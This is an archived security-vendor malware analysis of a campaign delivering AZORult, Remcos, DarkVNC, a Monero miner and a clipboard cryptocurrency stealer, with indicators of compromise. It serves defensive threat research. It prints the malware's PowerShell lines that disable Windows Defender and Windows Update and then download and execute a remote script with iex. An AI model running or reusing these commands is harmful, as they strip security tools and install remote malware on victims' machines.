{
	"id": "a195e7ac-9e4d-471d-bda7-db3b9453f074",
	"created_at": "2026-04-06T00:16:07.806556Z",
	"updated_at": "2026-04-10T03:21:48.341777Z",
	"deleted_at": null,
	"sha1_hash": "97deaaf4ca4b69bd031f5f780a1f3c5ec7ace620",
	"title": "AZORult brings friends to the party",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1433004,
	"plain_text": "AZORult brings friends to the party\r\nBy Vanja Svajcer\r\nPublished: 2020-04-02 · Archived: 2026-04-05 14:07:36 UTC\r\nBy Vanja Svajcer.\r\nNEWS SUMMARY\r\nWe are used to ransomware attacks and big game hunting making the headlines, but there is an undercurrent of other\r\nattack types that allow attackers to monetize their efforts in a less intrusive way.\r\nHere, we discuss a multi-pronged cyber criminal attack using a number of techniques that should alert blue team\r\nmembers with appropriate monitoring capability but are not immediately obvious to end-users.\r\nThese threats demonstrate several techniques of the MITRE ATT\u0026CK framework, most notably T1089 (Disabling\r\nSecurity Tools), T1105 (Remote File Copy), T1027 (Obfuscated Files or Information), T1086 (PowerShell), T1202\r\n(Indirect Command Execution), T1055 (Process Injection), T1064(Scripting), T1053 (Scheduled Task) and T1011\r\n(Exfiltration Over Other Network Medium) Attackers are constantly reinventing ways of monetizing their tools.\r\nCisco Talos recently discovered a complex campaign with several different executable payloads, all focused on\r\nproviding financial benefits for the attacker in a slightly different way. The first payload is a Monero cryptocurrency\r\nminer based on XMRigCC, and the second is a trojan that monitors the clipboard and replaces its content. There's\r\nalso a variant of the infamous AZORult information-stealing malware, a variant of Remcos remote access tool and,\r\nfinally, the DarkVNC backdoor trojan.\r\nWhat's new?\r\nEmbedding an executable downloader in an ISO image file is a relatively new method of delivery for AZORult. It's\r\nalso unusual to see attackers using multiple methods to make money.\r\nHow did it work?\r\nThe infection chain starts with a ZIP file, which contains an ISO disk image file. When the user opens the ISO file, a\r\ndisk image containing an executable loader is mounted. When the loader is launched, it deobfuscates malicious code\r\nwhich downloads the first obfuscated PowerShell loader stage that kickstarts the overall infection, disables security\r\ntools and Windows update service and downloads and launches the payloads.\r\nSo what?\r\nDefenders need to be constantly vigilant and monitor the behavior of systems within their network. Attackers are like\r\nwater — they will attempt to find the smallest crack to achieve their goals. While organizations need to be focused on\r\nprotecting their most valuable assets, they should not ignore threats that are not particularly targeted toward their\r\ninfrastructure.\r\nTechnical case overview\r\nIntroduction The initial trigger for this investigation was a telemetry entry that showed a PowerShell process\r\nlaunching a download and executing a PowerShell loader.\r\nAfter the drill-down, the telemetry shows that the PowerShell downloading code was launched by an executable dropper\r\nincluded in an ISO image that's mounted within the operating system by the user. The ISO image seems to have been\r\ndownloaded compressed with ZIP, possibly encrypted with a password, which indicates it's primarily spread via email.\r\nExecutable dropper with anti-sandboxing The dropper's functionality is rather simple, but the code contains some\r\ninteresting features. All malicious API calls are resolved dynamically but locating the PEB and traversing one of the\r\nlists of loaded modules in memory to find the module address. From there, the downloader goes through the export\r\ntable in order to find and return the address of the required functions which is then indirectly called using one of the\r\n'call reg' instructions.\r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 1 of 14\n\nAll strings, including the entire command line for the downloader PowerShell code are encrypted with a static byte key,\r\ndifferent for each string, which also gets decrypted during the execution.\r\nCommand-line for the PowerShell downloader is deobfuscated using a byte XOR key.\r\nThe most interesting feature is the function that randomly calls APIs from the lists twice. First, two randomly generated\r\nnumbers from 0 to 9 are generated by a pseudo-random number generator and those numbers — m and n are used as\r\nparameters for the function.\r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 2 of 14\n\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 3 of 14\n\nRandom API calls function\r\nThe function first randomly chooses and calls m and then n APIs from the list:\r\nGetCommandLineA\r\nGetTickCount\r\nGetLastError\r\nGetSystemDefaultLangID\r\nGetCurrentProcess\r\nGetProcessHeap\r\nGetEnvironmentStrings\r\nThis is likely done to confuse behavioral detectors, emulators and sandboxes which may base their detections on\r\nsequences of executed API calls.\r\nThe downloader eventually calls the MessageBox API to display a fake error message.\r\nExecutable downloader fake error message.\r\nFirst stage PowerShell loader The first stage of the PowerShell loader is a simple command line:\r\nWhen the base64 command-line option is decoded, we reach the actual downloading code which uses\r\ngithubusercontent.com to first disable Windows Defender, stop Windows update, download and execute the next malware\r\nstage using the Invoke-Expression cmdlet.\r\nSet-MpPreference -DisableRealtimeMonitoring $true\r\ncmd /c reg add 'HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d\r\ncmd /c sc stop wuauserv\\r\\ncmd /c sc config wuauserv start= disabled\r\niex ((New-Object\r\nSystem.Net.WebClient).DownloadString('hxxps://gist[.]githubusercontent[.]com/mysslacc/a5b184d9d002bf04007c4bbd2a53eeea/raw\r\nThe downloaded PowerShell script is first base64-decoded and decrypted using the cmdlet ConvertTo-SecureString. The\r\nresult is an obfuscated PowerShell script with several layers of obfuscation, a result of applying the Invoke-Obfuscation\r\nmethod to the initial code. Once deobfuscated, we can see the functionality of the PowerShell loader.\r\nPowerShell loader\r\nThe PowerShell script downloaded and executed by the executable downloader is responsible for the installation of\r\npayloads and ensuring that they stay persistent after user logs out. All the payloads are downloaded from external\r\nsites.\r\nThe loader first sets the PowerShell preferences so that the warning and error messages are not displayed and so that the\r\nscript continues executing if an error is encountered.\r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 4 of 14\n\n$WarningPreference = \"SilentlyContinue\"\r\n$erroractionpreference = \"SilentlyContinue\"\r\nThe execution continues with checking the current privileges. The loader behaves differently if the user has administrative\r\nprivileges.\r\nIf the user does not have administrative privileges, the loader creates the registry value HKCU\\Software\\Kumi and stores a\r\nbase64 encoded string that contains code to download and execute a variant of XMRigCC cryptocurrency miner. It then\r\ncreates a scheduled task with the name OneDrive SyncTask to execute hourly and launch the miner which is read from the\r\npreviously created registry entry.\r\nIf the user belongs to the administrators' group, the loader will first create exclusion folders for the Windows Defender so\r\nthat certain folders are not scanned and then attempt to disable various Defender's user notifications so that the user is not\r\nnotified if any of the components in the attack are detected. Malwarebytes anti-malware service will also be stopped and\r\ndeleted if it exists on the computer.\r\nFinally, if the loader has administrative privileges it will attempt to create three services WinDefends, thundersec and\r\nWindowsNetworkSVC, and create three scheduled tasks to launch those services on an hourly basis. The task names are\r\n\\Microsoft\\Windows\\Shell\\updshell, \\Microsoft\\Windows\\Autochk\\SystemProxy and\r\n\\Microsoft\\Windows\\MobilePC\\DetectPC.\r\nAt the time of writing, the first URL contained a loader for either a variant of Remcos remote access tool or a variant of\r\nDarkVNC remote access trojan. If the user has administrative privileges, the loader launches Remcos. Otherwise, it launches\r\nDarkVNC.\r\nThe loader then downloads and launches a clipboard modification trojan from githubusercontent.com with the filename\r\nclp.exe in the user's temporary folder. This cryptocurrency stealer is described later.\r\nRegardless of the permissions, the loader will create a registry value HKCU\\Software\\cr\\d and store the code to download\r\nand launch one of the above backdoor trojans and creates a scheduled task \"Update Shell\" to run every five hours. The task\r\nretrieves the value stored as a base64 encoded string in the registry and downloads code from the URL\r\nhxxps://raw[.]githubusercontent[.]com/mysslacc/thd/master/base.\r\nFinally, the loader uses a process injector RunPE to inject a variant of the Azorult information-stealing trojan into the\r\nnotepad.exe process.\r\nProcess tree of the PowerShell loader as seen in Cisco Threat Grid\r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 5 of 14\n\nPayloads\r\nXMRigCC cryptominer\r\nPerhaps the least interesting payload installed by the loader, XMRigCC is a variant of an open-source miner that can\r\nbe controlled through a command and control (C2) console. XMRigCC has its own loader, which is called by\r\ndecoding and executing the content of the variable $kumi of the main loader.\r\nThe particular payload is not configured to connect to a command and control server but chooses its pool host from a list of\r\nthe following URLs. All connections are conducted over port 443, possibly to avoid easy detections when other ports are\r\nused.\r\nThe list of hosts from the configuration is:\r\neu[.]minerpool[.]pw\r\n185[.]10[.]68[.]220\r\nrig[.]zxcvb[.]pw\r\nrig[.]myrms[.]pw\r\nback123[.]brasilia[.]me\r\nrs[.]fym5gserobhh[.]pw\r\nCisco Umbrella showing a spike of DNS requests for eu[.]minerpool[.]pw.\r\nThe cryptominer installs itself depending on the loader's process privileges. If the PowerShell loader has administrative\r\nprivileges, it will attempt to disable Windows Defender, Malwarebytes, Sophos and HitMan Pro if they are installed. The\r\nloader then downloads the payload from the IP address 195.123.234.33, and copies it into\r\nC:\\ProgramData\\Oracle\\Java\\java.exe.\r\nOne of the interesting features is the download of a third-party driver, WinSys0 from the OpenLibSys utility, which allows\r\nthe client application to read and write physical memory. However, it seems that the driver is not used and there is no\r\nevidence of the driver being loaded into memory.\r\nThe loader creates the following scheduled tasks:\r\n\\Microsoft\\Windows\\Bluetooth\\UpdateDeviceTask\r\n\\Microsoft\\Windows\\Shell\\WindowsShellUpdate\r\n\\Microsoft\\Windows\\Shell\\WinShell\r\n\\Microsoft\\Windows\\UPnP\\UPnPHost\r\n\\Microsoft\\Windows\\UPnP\\UPnPClient Task\r\n\\Microsoft\\Windows\\SMB\\SMB Task\r\n\\Microsoft\\Windows\\EDP\\EDP App Lock Task\r\n\\Microsoft\\Windows\\EDP\\EDP App Update Cache\r\n\\Microsoft\\Windows\\MobilePC\\DetectPC\r\n\\Microsoft\\Windows\\.NET Framework\\.NET Framework Cache Optimization\r\n\\Microsoft\\Windows\\.NET Framework\\.NET Framework Cache Optimization Files-S-3-5-21-2236678155-\r\n433529325-2142214968-1138  \r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 6 of 14\n\nand creates one of the two services, depending on the bitness of the operating system:\r\ncli_optimization_v2.0.55727_64\r\ncli_optimization_v2.0.55727_32\r\nThe services simply call mshta.exe to download an HTML application that downloads and runs the same cryptominer\r\nloader.\r\nThe loader downloads and runs a PowerShell script del.ps1 that disables Windows event logging and attempts to terminate\r\nsystem utilities such as Process Explorer, Task Manager, Process Monitor and Daphne Task Manager.\r\nThe non-administrative branch of the cryptominer loader is quite similar and takes into account that changes are made to\r\nobjects that can be modified by the current user.\r\nHere is the list of new scheduled task names created by the lower-privilege branch of the loader:\r\nOneDrive Sync\r\nOneDrive SyncTask\r\nOptimization .NET\r\nOptimize Start Menu Cache Files-S-3-5-21-2236678155-433519125-1142214968-1037\r\nOptimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1137\r\nOptimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1138\r\nOptimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1337\r\nOptimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1447\r\nOptimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142314968-1037\r\n\\Microsoft\\Windows\\Optimization\r\nClipboard cryptocurrency stealer\r\nThe next payload is a cryptocurrency clipboard-stealing trojan. The main loader downloads it from\r\nhxxps://gist[.]githubusercontent[.]com/mysslacc/ee6d2b99f8e3a3475b7a36d9e96d1c18/raw/1a82b38931d8421406f53eb8fc4c771127b\r\nsaves it in the user's temporary folder as \"clp.exe,\" which is then launched.\r\nThe trojan copies itself into the file updip.exe in the user's ProgramData\\updip folder and creates a link file udpid.lnk in the\r\nuser's Startup folder so that the malware runs every time the user logs into the system. The link file is created by a\r\nPowerShell process that is called directly by the trojan with a long command line containing a base64-encoded script.\r\nThe persistence is also ensured by creating a new scheduled task — GoogleChromeUpdateTask — which runs the trojan\r\nevery three hours.\r\nApart from the installation and persistence, the main functionality of the trojan is contained in a simple loop that monitors\r\nthe clipboard content every half a second. The trojan contains an obfuscated list of regular expressions used to match the\r\nclipboard content. The strings are stored either as a data buffer or as constants assigned to contiguous memory locations.\r\nOnce a buffer is created, its contents are XORd with the byte key 0x2e.\r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 7 of 14\n\nDeobfuscating a regex to match Bitcoin addresses.\r\nHere, we see that the trojan initialises a memory buffer with the value\r\n70751f1d73754f03454303546f03666403607e03741e031773551c18021d1d53, which after XOR, reveals a regular\r\nexpression #^[13][a-km-zA-HJ-NP-Z0-9]{26,33}$, apparently used to match Bitcoin addresses. If a Bitcoin address is\r\nmatched, the malware calls the routine to modify the clipboard, presumably to redirect any transactions to the address owned\r\nby the attacker.\r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 8 of 14\n\nDecrypting attacker's Bitcoin wallet address to replace the clipboard data.\r\nBased on the arguments of the function, the trojan will choose one of the attacker-owned cryptocurrency addresses and\r\nmodify the clipboard to contain the deobfuscated data. Once again, we see here that the buffer is filled with the value\r\n1d6d5d4a17745f1a5c1f184a787f5b7c6b5d1b1c571b4b646849776b5f7f446f561f, which becomes the address\r\n3Csd9Zq4r16dVQuREs52y5eJFgYEqQjAx1 after deobfuscation. We can easily see that this address earned just a bit under\r\nsix Bitcoins over time.\r\nThe number of transactions and the amount earned by the clipboard stealer in Bitcoins.\r\nThe trojan targets Bitcoin, Litecoin, Ethereum, Dash, Monero and Doge-Coin using the following regular expressions:\r\n^[13][a-km-zA-HJ-NP-Z0-9]{26,33}$ - Bitcoin\r\n^0x[a-fA-F0-9]{40}$\r\n^[LM][A-z][1-9A.z]{32}$\r\n^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$ Doge-Coin\r\n^DX[a-z][1-9A-z]{32}$ - Dash - incorrect regular expression\r\n^[0-9][0-9AB][123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{93}$ - Monero\r\nThe next three payloads are all delivered using a PowerShell technique which downloads an obfuscated binary loader and a\r\nbyte array in a text format and transforms them into actual binaries. The download is executed by using reflection to load the\r\nVisualBasic assembly and then interact with PowerShell using the VisualBasic interaction interface. The script first\r\ndecompresses and loads a binary loader RunPE, which is then used to load a byte array that contains the binary payload into\r\nthe process space of a newly created process, explorer.exe, control.exe or notepad.exe for Remcos, DarkVNC and Azorult\r\nrespectively. All of the payloads are common so we will only briefly describe them. A full analysis is outside of the scope of\r\nthis post.\r\nDownloading and loading RunPE that loads a DarkVNC payload from a byte array\r\nAZORult\r\nAZORult is an information-stealing bot written in Delphi which connects to a command and control server for so-called \"work\", which comes in a format of a JSON configuration. The communication with the C2 server is\r\nconducted using HTTP with the payload encrypted with a default XOR key 0x0d, 0x0a, 0xc8.\r\nOnce installed, the bot contacts the server using a POST request. Depending on the version of the bot the server can send a\r\nJSON configuration or a set of DLLs to help with stealing information as well as a set of new strings that should be used\r\nwhen matching targeted content for exfiltration.\r\nAZORult may attempt to execute one or more of:\r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 9 of 14\n\nSteal stored browser passwords\r\nSteal cryptocurrency wallets\r\nSteal browser history\r\nSteal website cookies\r\nSteal email credentials\r\nSteal Telegram credentials\r\nSteal Steam credentials\r\nSteal Skype credentials and message history\r\nTake victim machine screenshots\r\nExecute custom commands\r\nRemcos\r\nRemcos is a RAT that is offered for sale by a company called Breaking Security. While the company says it will only\r\nsell the software for legitimate uses as described in comments in response to the article here and will revoke the\r\nlicenses for users not following their EULA, the sale of the RAT gives attackers everything they need to establish and\r\nrun a potentially illegal botnet.\r\nRemcos has the functionalities that are typical of a RAT. It is capable of hiding in the system and using malware techniques\r\nthat make it difficult for the typical user to detect the existence of Remcos. It is written in C++ and is relatively small for the\r\nrich functionality it contains.\r\nThe Remcos payload included by the PowerShell loader is the latest version 2.5.0. Talos has created a decoder that allows\r\nsimple extraction of Remcos configurations. Cisco Umbrella shows an increase in requests for the default C2 domain\r\ndfgdgertdvdf.xyz of the sample around the time we found the initial PowerShell loader.\r\nDNS activity for the default C2 domain of the Remcos payload.\r\nDarkVNC\r\nIf the user does not have administrative privileges the loader will attempt to load a variant of the DarkVNC trojan,\r\nwhich allows the attacker to remotely access the infected system using the VNC protocol. The C2 server IP address\r\nfor this sample, 52.15.61.57, is shared with one of the C2 domains specified in the Remcos sample configuration —\r\ndfgdgertdvdf.online.\r\nThis IP address has been actively used in several campaigns from at least mid-December 2019.\r\nIndeed, we can see that the DNS activity for this domain corresponds with the activity for the default Remcos C2. DarkVNC\r\nattempts to connect to the C2 server using the TCP port 8080, likely to be less suspicious as this is one of the default ports\r\nfor connections to HTTP proxies.\r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 10 of 14\n\nDNS activity for the default C2 domain of the DarkVNC payload.\r\nDarkVNC launches a new svchost.exe process and depending on the bitness of the operating system injects a version of a\r\n32- or 64-bit DLL into the svchost.exe process space. The loaded library is extracted from the dropper and it contains remote\r\naccess functionality.\r\nConclusion\r\nIn this post, we covered an attack that comes from an actor with a low to medium level of technical ability but quite a\r\nclear idea on how to achieve their financial goals. For that they decided to employ a combination of several payloads,\r\nranging from a cryptocurrency miner to well-known information stealer AZORult, remote access tools Remcos and\r\nDarkVNC and a clipboard modification trojan.\r\nLoaders and payloads used in the AZORult, Remcos et co attack.\r\nIt is worth remembering that even in special times for cyber criminals, it is just business as usual. Furthermore, as users are\r\nworried by the SARS-CoV-2 pandemic and are increasingly working from home the attackers will take advantage and\r\ncontinue to conduct their attacks with a higher probability of remaining unnoticed.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 11 of 14\n\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.\r\nExploit Prevention present within AMP is designed to protect customers from unknown attacks such as this automatically.\r\nCisco Cloud Web Security (CWS) orWeb Security Appliance (WSA) web scanning prevents access to malicious websites\r\nand detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System\r\n(NGIPS),Cisco ISR, andMeraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether\r\nusers are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for\r\npurchase onSnort.org.\r\nIoCs\r\nOSQuery\r\nCisco AMP users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this\r\nspecific threat. For specific OSqueries on this threat, click below:\r\nMalware AZORult Registry\r\nSHA256\r\nPE Payloads\r\nbf2f3f1db2724b10e4a561dec10f423d99700fec61acf0adcbb70e23e4908535 - Remcos payload\r\n42525551155fd6f242a62e3202fa3ce8f514a0f9dbe93dff68dcd46c99eaab06 - AZORult payload\r\n2014c4ca543f1cc946f3b72e8b953f6e99fbd3660edb4b66e2658b8428c0866d - 64 bit XMRigCC\r\nbde46cf05034ef3ef392fd36023dff8f1081cfca6f427f6c4894777c090dad81 - DarkVNC main\r\n1c08cf3dcf465a4a90850cd256d29d681c7f618ff7ec94d1d43529ee679f62f3 - DarkVNC 64 bit DLL\r\na02d761cbc0304d1487386f5662a675df3cc6c3ed199e8ed36f738e9843ccc1b - RunPE loader for AZORult, Remcos and\r\nDarkVNC\r\n2f1668cce3c8778850e2528496a0cc473edc3f060a1a79b2fe6a9404a5689eea - Clipboard Crypto currency stealer unpacked\r\n9e3a6584c77b67e03965f2ae242009a4c69607ea7b472bec2cba9e6ba9e41352 - 32 bit XMRigCC\r\n29695ca6f5a79a99e5d1159de7c4eb572eb7b442148c98c9b24bdfdbeb89ffc0 - 32 DarkVNC dll\r\naca587dc233dd67f5f265bfda00aec2d4196fde236edfe52ad2e0969932564ed - Clipboard Crypto currency stealer\r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 12 of 14\n\nDroppers\r\n598c61da8e0932b910ce686a4ab2fae83fa3f1b2a4292accad33ca91aa9bd256 - Main Executable loader\r\nd88ed1679d3741af98e5d2a868e2dcb1fa6fbd7b56b2d479cfa8a33d8c4d8e0b - ISO image distributeted in a ZIP file\r\nHTML apps connected with XMRigCC\r\n936fbe1503e8e0bdc44e4243c6b498620bb3fefdcbd8b2ee85316df3312c4114\r\n57f1b71064d8a0dfa677f034914e70ee21e495eaab37323a066fd64c6770ab6c\r\nf46a1556004f1da4943fb671e850584448a9521b86ba95c7e6a1564881c48349\r\nb7c545ced7d42410c3865faee3a47617f8e1b77a2365fc35cd2661e571acdc06\r\nPowerShell scripts\r\n2548072a77742e2d5b5ee1d6e9e1ff9d67e02e4c96350e05a68e31213193b35a\r\n14e956f0d9a91c916cf4ea8d1d581b812c54ac95709a49e2368bd22e1f0a32ca - XMRigCC loader\r\ncea286c1b346be680abbbabd35273a719d59d5ff8d09a6ef92ecf75689b356c4 - deobfuscated PowerShell Downloader\r\n35b95496b243541d5ad3667f4aabe2ed00066ba8b69b82f10dd1186872ce4be2 - cleanup script\r\nef9fc8a7be0075eb9372a2564273b6c1fffdb4b64f261b90fefea1d65f79b34e - part of XMRigCC support\r\n3dd5fbf31c8489ab02cf3c06a16bca7d4f3e6bbc7c8b30514b5c82b0b7970409 - Main PowerShell loader variant\r\nq5fdc4103c9c73f37b65ac3baa3cceae273899f4e319ded826178a9345f6f4a00 - Main PowerShell loader variant\r\nURLs hxxp://195[.]123[.]234[.]33/win/checking[.]hta\r\nhxxp://195[.]123[.]234[.]33/win/checking[.]ps1\r\nhxxp://195[.]123[.]234[.]33/win/del[.]ps1\r\nhxxp://195[.]123[.]234[.]33/win/update[.]hta\r\nhxxp://answerstedhctbek[.]onion\r\nhxxp://asq[.]r77vh0[.]pw/win/checking[.]hta\r\nhxxp://jthnx5wyvjvzsxtu[.]onion[.]pet\r\nhxxp://qlqd5zqefmkcr34a[.]onion[.]pet/win/checking[.]hta\r\nhxxps://answerstedhctbek[.]onion\r\nhxxps://answerstedhctbek[.]onion[.]pet\r\nhxxps://asq[.]d6shiiwz[.]pw/win/checking[.]ps1\r\nhxxps://asq[.]d6shiiwz[.]pw/win/hssl/d6[.]hta\r\nhxxps://asq[.]r77vh0[.]pw/win/checking[.]ps1\r\nhxxps://asq[.]r77vh0[.]pw/win/hssl/r7[.]hta\r\nhxxps://darkfailllnkf4vf[.]onion[.]pet\r\nhxxps://dreadditevelidot[.]onion[.]pet\r\nhxxps://fh[.]fhcwk4q[.]xyz/win/checking[.]ps1\r\nhxxps://fh[.]fhcwk4q[.]xyz/win/hssl/fh[.]hta\r\nhxxps://qlqd5zqefmkcr34a[.]onion[.]pet/win/checking[.]hta\r\nhxxps://runionv62ul3roit[.]onion[.]pet\r\nhxxps://rutorc6mqdinc4cz[.]onion[.]pet\r\nhxxps://thehub7xbw4dc5r2[.]onion[.]pet\r\nhxxps://torgatedga35slsu[.]onion\r\nhxxps://torgatedga35slsu[.]onion[.]pet\r\nhxxps://torrentzwealmisr[.]onion[.]pet\r\nhxxps://uj3wazyk5u4hnvtk[.]onion[.]pet\r\nhxxps://vkphotofqgmmu63j[.]onion[.]pet\r\nhxxps://xmh57jrzrnw6insl[.]onion[.]pet\r\nhxxps://zqktlwiuavvvqqt4ybvgvi7tyo4hjl5xgfuvpdf6otjiycgwqbym2qad[.]onion[.]pet\r\nhxxps://zzz[.]onion[.]pet\r\nhxxp://memedarka[.]xyz/ynvs2/index.php\r\nDomains dfgdgertdvdf[.]online - DarkVNC and Remcos C2\r\ndfgdgertdvdf[.]xyz - Remcos C2\r\nmemedarka[.]xyz - AZORult C2\r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 13 of 14\n\nCryptocurrency wallets\r\n855vLkzTFwr82TrfPKLH6w3UB19RGdHDsGY1etmdyZjZChbhyghtiK66ZVXoVayJXVNydca7KZqE53Dn2Hsk8WdKDmjq3bu\r\n- Monero\r\nXrchZULVyJPAFro13627cyKdfb6ojerRwv - Dash\r\n3Csd9Zq4r16dVQuREs52y5eJFgYEqQjAx1 - Bitcoin\r\n0x51664e573049ab1ddbc2dc34f5b4fc290151cdb4 - Ethereum\r\nLS2GBEJEzgDy14hVHFp4JJzjKoiMgkbZAY - Litecoin\r\nD6yFAuCDoMkCftyXTWY8m267PzxeoaiMX7 - Doge-coin\r\nSource: https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html"
	],
	"report_names": [
		"azorult-brings-friends-to-party.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434567,
	"ts_updated_at": 1775791308,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/97deaaf4ca4b69bd031f5f780a1f3c5ec7ace620.pdf",
		"text": "https://archive.orkl.eu/97deaaf4ca4b69bd031f5f780a1f3c5ec7ace620.txt",
		"img": "https://archive.orkl.eu/97deaaf4ca4b69bd031f5f780a1f3c5ec7ace620.jpg"
	}
}